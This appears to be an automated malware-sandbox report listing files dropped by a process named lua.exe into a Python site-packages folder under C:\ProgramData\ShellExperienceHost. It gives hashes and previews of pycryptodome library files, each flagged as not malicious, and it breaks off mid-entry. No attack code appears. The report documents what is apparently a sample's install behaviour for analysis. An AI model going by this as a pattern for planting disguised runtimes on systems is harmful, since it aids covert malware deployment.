Preview:	# -- coding: utf-8 --..#..# Random/random.py : Strong alternative for the standard 'random' module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# C

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Random\random.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	827
Entropy (8bit):	4.8519295117268975
Encrypted:	false
SSDEEP:	24:1REqJeQCE+sAJOIE5P0fid1o4ZKXiojo/f:qQp+sd5CidO4fao/f
MD5:	B0274B8319F0D3895EBFC8E701A4F581
SHA1:	5BD9674085E5F80F101C78EDB96DCA0D1AD085B9
SHA-256:	4D65794E5AF850BE7D2AAD195AAC257F88092963022672302BB88FF2659282E4
SHA-512:	34BF84E9C8D59547411AF5F0ABC518C1CC368E89FB9F8F2EA4A254B6AE3E679A0697F895CE42AC362F7E97D29AFCD970D0E13B518D53B2B5B990A2C07935CEE3
Malicious:	false
Preview:	from typing import Callable, Tuple, Union, Sequence, Any, Optional....__all__ = ['StrongRandom', 'getrandbits', 'randrange', 'randint', 'choice', 'shuffle', 'sample']....class StrongRandom(object):.. def __init__(self, rng: Optional[Any]=None, randfunc: Optional[Callable]=None) -> None: ... # TODO What is rng?.. def getrandbits(self, k: int) -> int: ..... def randrange(self, start: int, stop: int = ..., step: int = ...) -> int: ..... def randint(self, a: int, b: int) -> int: ..... def choice(self, seq: Sequence) -> object: ..... def shuffle(self, x: Sequence) -> None: ..... def sample(self, population: Sequence, k: int) -> list: ......._r = StrongRandom()..getrandbits = _r.getrandbits..randrange = _r.randrange..randint = _r.randint..choice = _r.choice..shuffle = _r.shuffle..sample = _r.sample..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\Counter.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3187
Entropy (8bit):	5.012737590387847
Encrypted:	false
SSDEEP:	48:MRwEIB0jcQHMsvI/S3oCFGAZUqjZibFduSmZpXE3bpJ5U:MRwfFQHvo2Uq1cFYSYpXE3bpJ5U
MD5:	B6C4861C88BDB038DA75C5BE6C0A62DA
SHA1:	6F7EFF1D3929D3B1B86E037C4A966C3577C63B67
SHA-256:	DD54E1AF51F0335A7892D16155A9EDDF61380AC719EE42124B09B2EBC35B5687
SHA-512:	D4869AF3B5A820EEB156E1CA72BFD97FB3A6618A16BC665732C80164C774AF7AB51658646D19F6803B21776C8610B1467023C4C35D13926A071E5ECBB4190700
Malicious:	false
Preview:	# -- coding: ascii --..#..# Util/Counter.py : Fast counter for use with CTR-mode ciphers..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\Counter.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	295
Entropy (8bit):	4.705947008789207
Encrypted:	false
SSDEEP:	6:1REYBr0hxrMND0R2D9F6s/2F62LMJteOFr2gCUA2gA1MJFuJry:1REYBr0DI1RFF2FDLMJzZ2gCn2gA1gM4
MD5:	48844D3840F12D7CC253481AEB936730
SHA1:	2329321B884361FF52CD1E79D4ECD3ABD2C08309
SHA-256:	7A86661370C3B894AEB4EDAD8755466DE52226588608A530F63F3E3379585AD0
SHA-512:	06990D253057568DB8B16CAFF5599CD48FDE3100B5193213BD250BD1797D11F2A62C00D493AAC5CA60CD557514B3AC543454D9D50991B9EEAA735B3D6E3A7150
Malicious:	false
Preview:	from typing import Optional, Union, Dict....def new(nbits: int, prefix: Optional[bytes]=..., suffix: Optional[bytes]=..., initial_value: Optional[int]=1,.. little_endian: Optional[bool]=False, allow_wraparound: Optional[bool]=False) -> \.. Dict[str, Union[int, bytes, bool]]: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\Padding.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4421
Entropy (8bit):	5.191112640865006
Encrypted:	false
SSDEEP:	96:e1tDqrYJALrYJHdt3EHGuI2gHdYUI1e+GJF37gR8C91/ErvyGAhQyAk:e1Vqrskrs9t3q/ILxF379aGyQyh
MD5:	FBF391FD249DDBB1C32502AC42999B5D
SHA1:	9559F22269BBE2A0F918705DED635B8CC666DD10
SHA-256:	A04416E7AA698FFFC0301EE284720426B69E9A3BCB2A0C7E954A054698C29405
SHA-512:	4241AEF302C010640C2FA86D92F2EE7EA34A865F759D14C02024F62A3452C593C0BCCABFE46043E879EB1CD73A290F85C0DD106A294684F628C100EA06382DF9
Malicious:	false
Preview:	#..# Util/Padding.py : Functions to manage padding..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SH

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\Padding.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	243
Entropy (8bit):	4.823438083026704
Encrypted:	false
SSDEEP:	6:1REYB0yqDLWJJni6Co6sRGcp5gUeQ/6sRGcp5/:1REYBkDyHZHRGe5VeQPRGe5/
MD5:	72AE5A92A5B5373240F3184324E84F6B
SHA1:	976AEA0ED87A3C086D068AE560FDB2FFCD591676
SHA-256:	ED464B7B39D2481D2C4DE1FF908308ADF7F035B21B3F7A242E469F1BD173DEF6
SHA-512:	27C15B7D76E180E1B65D566D8225C3661E78854515C9716A645C5F62E444B5A90AB61DDF92677B9C4A1276921711C281C814CAC60FA6D0BFC76A7716E4124613
Malicious:	false
Preview:	from typing import Optional....__all__ = [ 'pad', 'unpad' ]....def pad(data_to_pad: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: .....def unpad(padded_data: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: ...

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\RFC1751.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21578
Entropy (8bit):	4.591349548627808
Encrypted:	false
SSDEEP:	384:aPe4cRum4V+EE2tKm/8MboR6U/6LcleM6s4riu6gvZGVSRq67:DAfHQgRGVe37
MD5:	73AEDFB55D3A90F08A29CC5D0AB7E623
SHA1:	D576725EC2571123AFE056369B58063BFB9D7724
SHA-256:	DFDB8CD578E00E485AD2070F24A3CFD7B0E75C972EBA73912B0BB59D8D67193B
SHA-512:	BB63BA3D20FC92A942F16C35E0128AEB2810310F75778FD6218D037D40AFFFCF3E19FFADE08882C0EC781548EACB5588A5B5A964E96FC5753CF44A9053EAADFD
Malicious:	false
Preview:	# rfc1751.py : Converts between 128-bit strings and a human-readable..# sequence of words, as defined in RFC1751: "A Convention for..# Human-Readable 128-bit Keys", by Daniel L. McDonald...#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DA

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\RFC1751.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	166
Entropy (8bit):	4.7074966574817525
Encrypted:	false
SSDEEP:	3:1REvgBoGvFbT/uopMLUXvcgEsbd7RC7L6yuCnhlxEmu5gv:1REYBDFbaoiCEsdsPVua5EP5gv
MD5:	0DE296D8A8547E04D6926C50733B2BE8
SHA1:	00E9FDFFF578A121326A68BDDAD8C135CEDAD52D
SHA-256:	76B2DA534877F2226EA2D41EC36651EA9B0344F541B7B127DD6C51994F90F2C5
SHA-512:	1E6630A95E807139497202AB681F9B77974C90723DFFDADD1E100B4802B0D677DD4D2A3AC65A8ECF700AC6E1CC8BB353C2EBFFBBEE0AFB1C6ACA4C0D78C72A9E
Malicious:	false
Preview:	from typing import Dict, List....binary: Dict[int, str]..wordlist: List[str]....def key_to_english(key: bytes) -> str: .....def english_to_key(s: str) -> bytes: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1968
Entropy (8bit):	4.96168817055765
Encrypted:	false
SSDEEP:	48:KIB0jcQHMsvI/S3oCFxSawf+bBVZ4YuOr2:dFQHvoEQ+tvY
MD5:	CCD084ED08A6E3D89DC9B9ECD62D524D
SHA1:	439DDFB5344BA4510F46A29913E7764824094696
SHA-256:	98831540F44AB7137A0DE53A8A8C818DEC32F0DC9C2731912424AECCE04C07FA
SHA-512:	354925C7E294A4FEA723AEBE1F618EF8DF1A82FDE95B578C86AB8DC21473E0719832E05D8971B537633631AAF62A2C6885A0D2F1F92A584C93F96F76D8204867
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_cpu_features.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2035
Entropy (8bit):	5.0956096784751965
Encrypted:	false
SSDEEP:	48:MbWOqrYJALrYJHdG43tDs3EsIG13NcuIH2+Mq5+RscRV:MbDqrYJALrYJHdt3EHGuIWK5+RscRV
MD5:	D4DD7789231F56101EAA341F5FD21A95
SHA1:	81FFD38FA0896E265B36EF52A15EE3BA5FAD7A75
SHA-256:	38D65295DD3E4506C462350E7766FB7D16635CC7E6A234FE0E4B14C7AF6089C6
SHA-512:	268E5FEDF74F36A2309E83B6642ACE469D7871C29F1975D4080D5992E9A29F8DFA681EEE85E7E8106E6A15A95B0D2FC336A8EDB1B81BA55F49D3F9E940E8EA89
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_cpu_features.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.354688723015057
Encrypted:	false
SSDEEP:	3:pAQybsRVLSyUkMFjRVLy:OdbsRnORQ
MD5:	2318A22B25D0854BD019BAEF901BB42A
SHA1:	37E3185DAACB1E611F02805F63044E28779DEFFF
SHA-256:	72FD9C4BBFF5954C58E3AE5C421334E7A570E5E8108DCB45499F8B497B359F5E
SHA-512:	B38E4BB47DF8EB1D8457D32BA047D2AB5278925854FEF51B8B922C9D0DC092DF19A1BCF9DF1F33CABD79583AC10D289F29A4E5A67B55B886D4282C5404767403
Malicious:	false
Preview:	def have_aes_ni() -> int: .....def have_clmul() -> int: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_cpuid_c.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.663437725467417
Encrypted:	false
SSDEEP:	96:5T8MdJTCaDAH37Belrzu1x/r8qJ7pfJsPG6Q9qHaGB0oYAsDJ9UqvA:9TdJTlDmNelrzuLFf0Q+03DLU
MD5:	F35A4C3BB2FB8782C1C3F0D6B493CE77
SHA1:	688C8BAA950CFD77FDDED246976829CC7510FCE9
SHA-256:	A6FEBA74067FB03EE4BA53D1608AB8012EB6BD1F995EBC42C21D653D57B8320B
SHA-512:	5CB5219DD33AC40BD901298F17945FAD21B25B0358056D10C84440048CF845BBB7ACD0F6501D4284508B7559EAE04074B03D13F6A1E4069DF011895DFD3CEAC9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mr..............t......,}.......g..............,}......,}......,}.......~.......~.......~.......~......Rich............................PE..d...w.!`.........." ................T........................................p............`..........................................'..\|...\|'..P....P.......@...............`..$....!...............................!..8............ ...............................text............................... ..`.rdata..H.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....`.......&..............@..B........................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_file_system.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2225
Entropy (8bit):	5.261890106278258
Encrypted:	false
SSDEEP:	48:MCWOqrYJALrYJHdG43tDs3EsIG13NcuIH3z+9gNQjdod9qRh3jy:MCDqrYJALrYJHdt3EHGuIXztObQ
MD5:	4505C49A1831D0C93256DA8E78C1564B
SHA1:	63721BBAEA6BE397ADC3C4C1AA4335DBECCE215C
SHA-256:	B8FF883AA293F99710EA591A58AA8D0D03FEEEDD5AA49C560B60A05FD3D413E1
SHA-512:	3C6F8710D907EE676C8770012E4DF3542A063D40185D52EF4C93AB98E8227F2C85C353C5B82B519D97D016FE62052084E8E4FB0B8609EBB59440F85E613A2602
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_file_system.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	103
Entropy (8bit):	4.5743153977203175
Encrypted:	false
SSDEEP:	3:1REvgBAWxXfcAiTMXtKIOcSkWtWemUL/:1REYB9xXkVM96nRWe1/
MD5:	FFE308959102B5607429CEF941E9560E
SHA1:	3DA8DA002FEBDA41FE88459082E6CD8E57B9A5B3
SHA-256:	2F8B0576992C17D8191119B78CF52F73540F11F2502360F71266F5FF848FB5B5
SHA-512:	35EE20412D0AC941F7368DAB82E4A4996DF4058981BA6C07B24E99D533C2BE38E65B8911A7E99EE03A370DF63B557DD3F77839CA10BE939C98BE3E14BB650C65
Malicious:	false
Preview:	from typing import List......def pycryptodome_filename(dir_comps: List[str], filename: str) -> str: ...

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_raw_api.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10078
Entropy (8bit):	4.863465744795804
Encrypted:	false
SSDEEP:	192:9qrskrs9t3q/IVtqYqUq5WZ0c2RlpZj0Xn4n/noWKcv4WAc:0rskrs9Vq4YZUq5WZr27pZ4X4/oQT
MD5:	115FDA98B111E1BF984CCC53805DF20E
SHA1:	E0F7A634613A634416F2F9F10B63A8AA510AAF2C
SHA-256:	B1F3A1D460FD9A2632C7FC33FF413B86DD7811354AC36F095DC62018F046EC6E
SHA-512:	A19AAA093D562C926300E13D8086996AA01FCE240AA0A91F077BC5DA7F10F5F4BD1748693E15A4AF9AD249C7FDB785B0354102CB684255ECF7537B567A0DE48C
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_raw_api.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.777842095513583
Encrypted:	false
SSDEEP:	24:1RExEeWw8O8GLziQDqwhBhhB+OTlAavvsZPWJuL:8EeTLPqkVv+PiE
MD5:	577B9FD6612492C13AAD9D5FDC396C43
SHA1:	2840A5AE5DA3ADA506BC9E64F4FB1324C021FCA7
SHA-256:	83C6B0310C82B4193830D59B3DABE23544ACF53FF2B53E0F918F2E8DB01F7485
SHA-512:	67E8794F498344EBEE1F95351169355EA139AE6937E867B7716E7A06ECEB3AE30F430630370BE7B06F325434041D9581DFA3831FFBF5F67FF7F88AE24C2935F0
Malicious:	false
Preview:	from typing import Any, Optional, Union....def load_lib(name: str, cdecl: str) -> Any : .....def c_ulong(x: int ) -> Any : .....def c_ulonglong(x: int ) -> Any : .....def c_size_t(x: int) -> Any : .....def create_string_buffer(init_or_size: Union[bytes,int], size: Optional[int]) -> Any : .....def get_c_string(c_string: Any) -> bytes : .....def get_raw_buffer(buf: Any) -> bytes : .....def c_uint8_ptr(data: Union[bytes, memoryview, bytearray]) -> Any : .......class VoidPointer(object):.. def get(self) -> Any : ..... def address_of(self) -> Any : .......class SmartPointer(object):.. def __init__(self, raw_pointer: Any, destructor: Any) -> None : ..... def get(self) -> Any : ..... def release(self) -> Any : .......backend : str..null_pointer : Any..ffi: Any....def load_pycryptodome_raw_lib(name: str, cdecl: str) -> Any : .....def is_buffer(x: Any) -> bool : .....def is_writeable_buffer(x: Any) -> bool : .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_strxor.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.621368392164991
Encrypted:	false
SSDEEP:	96:5l8MdJTCaDAH37Belrzu1x/r8qJ7pfJsPG6QggfPPYdsDJ9UKvb:fTdJTlDmNelrzuLFf0QhP3DLU
MD5:	DB1F79A96A1390028DF325DD183FF9F1
SHA1:	8373B6C44FDBECE2C1EE5327A2BB5E5B0A719ED4
SHA-256:	6429928799A5EEA9E090224A2D7083B469892D725A28EA9DCC2A95F94286B0DA
SHA-512:	DAD71F250340E529883E3347E90E66A445641F019351E745940C6700145C6C923A9D5575EFAF42436823BD8F1DB44E9B00C99EB1CC41DC49425EA9DB9847590E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mr..............t......,}.......g..............,}......,}......,}.......~.......~.......~.......~......Rich............................PE..d...z.!`.........." ................T........................................p............`..........................................&..t...d'..P....P.......@...............`..$....!...............................!..8............ ...............................text...x........................... ..`.rdata..0.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....`.......&..............@..B........................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\asn1.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	32680
Entropy (8bit):	4.4370822680300614
Encrypted:	false
SSDEEP:	384:p2eYt9DetUeh9+Ivu5HBKB19Asz9l3Uq3DIwES5LICXMJyhlx:pdY7SUAbvfmsz9l3Uq3MwES5LIt8hlx
MD5:	3BB14C7383F2F3C6444760B76C852325
SHA1:	C621709DF1E7E25A992CBF5EC2AFB01713987E51
SHA-256:	8978368501D757B6F16FAF5627223136E5E42E473F478440E57125F909C61803
SHA-512:	C1D998C9A7E668DA2617C5DDA6C905FEC6BFA86718BEE948BEAE39184452B8C48046DC44CD6480E0F68FE146B5806CAD4DC487CB994970635CBFD06A4ACD9660
Malicious:	false
Preview:	# -- coding: ascii --..#..# Util/asn1.py : Minimal support for ASN.1 DER binary encoding...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\asn1.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3653
Entropy (8bit):	4.8308384454210085
Encrypted:	false
SSDEEP:	48:AfkaQKSpAbry3S0XQohX9K6zOeXRVRlXfwQ2t60NWjMfXtqTXnE8xPJzSMAJGFXr:Acab6fHhM1eXTTvwB60oof8THB+Jk7
MD5:	20A4EB43093BC6D39AE165B1E6CFA2D6
SHA1:	B97AA5C095C2D17F28CBCC987563F98A5105152E
SHA-256:	99A3004FDFDFFCC6C0A1B0855D1E1394879BD73AB01A26AD93B90F256A0BC58D
SHA-512:	AABF40B82524FFECBA5528EDAA396CDC2725678736CDD826183EDD1C76B473507A307FAFA0C3AD43EBCB217BD27F88D03956A5CA56C80254E95D34B537305ECF
Malicious:	false
Preview:	from typing import Optional, Sequence, Union, Set, Iterable....__all__ = ['DerObject', 'DerInteger', 'DerOctetString', 'DerNull',.. 'DerSequence', 'DerObjectId', 'DerBitString', 'DerSetOf']....# TODO: Make the encoded DerObjects their own type, so that DerSequence and..# DerSetOf can check their contents better....class BytesIO_EOF:.. def __init__(self, initial_bytes: bytes) -> None: ..... def set_bookmark(self) -> None: ..... def data_since_bookmark(self) -> bytes: ..... def remaining_data(self) -> int: ..... def read(self, length: int) -> bytes: ..... def read_byte(self) -> bytes: .......class DerObject:.. payload: bytes.. def __init__(self, asn1Id: Optional[int]=None, payload: Optional[bytes]=..., implicit: Optional[int]=None,.. constructed: Optional[bool]=False, explicit: Optional[int]=None) -> None: ..... def encode(self) -> bytes: ..... def decode(self, der_encoded: bytes, strict: Optional[bool]=False) -> DerObject: .......c

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\number.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	96299
Entropy (8bit):	4.057737271722569
Encrypted:	false
SSDEEP:	1536:Engg5QeQwBkknbkEEpeoc06BsJ7rajyCJrOiVDtT5U1464iPpAji6R449qVnSPt4:0g6krtNajhJrOs5uPqe6CJn6KEVama39
MD5:	7A48F557293382535FEBCAA5AA5FB025
SHA1:	B4D4E18EE3A3500F1A2ED0032CA93A1454FDB0AC
SHA-256:	992CEC16CBD53F4F55C0693A63788ED4E467833D1D95AE3F8789F52E74F92EB7
SHA-512:	0D8DBE9E8FE8BDA5C2AC3336FA2A2AB933F9C99D9DD760DE11480C097CAB532D948FF0EE743C04DFB2AD7246CCAD1F8BE30A00D29E7F1AB860D0179492E5D720
Malicious:	false
Preview:	#..# number.py : Number-theoretic functions..#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling, Barry A. Warsaw, and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\number.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.898132103946567
Encrypted:	false
SSDEEP:	24:1RE0x1JCvE59p+vE59eE59iLdUKhGnE597pcSpShFE59cSpShFE5vUyrfunVshdU:bxX7Z+crYnJescsje
MD5:	81227B5A65D7EF13CB0247C9B7225673
SHA1:	8954A181B5E8D7B31145E5C139935B9780E4D1EB
SHA-256:	6BD67E3A908997245FB373BC1C4971BAC0CFDD5FC17D4B7CDBD3F51AD6774AF1
